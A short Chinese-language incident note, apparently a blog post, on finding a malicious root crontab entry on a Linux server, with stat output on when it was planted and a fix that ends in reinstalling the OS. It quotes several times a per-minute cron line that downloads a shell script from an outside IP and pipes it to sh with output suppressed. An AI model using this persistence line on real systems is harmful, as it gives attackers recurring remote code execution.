目錄
- 一、查看定時任務
- 二、處理方法
一、查看定時任務
# crontab -l
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1
0 */1 * * * /usr/local/nginx/sbin/nginx -s reload
發現異常任務:
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1
查 IP 發現為來自俄羅斯的惡意 IP:
查看主機環境變量已被更改,相關命令無法使用,且主機中異常計劃任務早于2023-07-04 就已被植入:
# cat /var/spool/cron/root
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1
0 */1 * * * /usr/local/nginx/sbin/nginx -s reload
# stat /var/spool/cron/rootFile: ‘/var/spool/cron/root’Size: 125 Blocks: 8 IO Block: 4096 regular file
Device: fd01h/64769d Inode: 552530 Links: 1
Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2024-06-06 10:39:22.013106004 +0800
Modify: 2023-07-04 12:50:46.478638868 +0800
Change: 2023-07-04 12:50:46.478638868 +0800
二、處理方法
清除異常任務,重啟服務器。
由于重啟前后,相關命令如ps、ls等都無法使用,最后重裝系統!
小結)
)
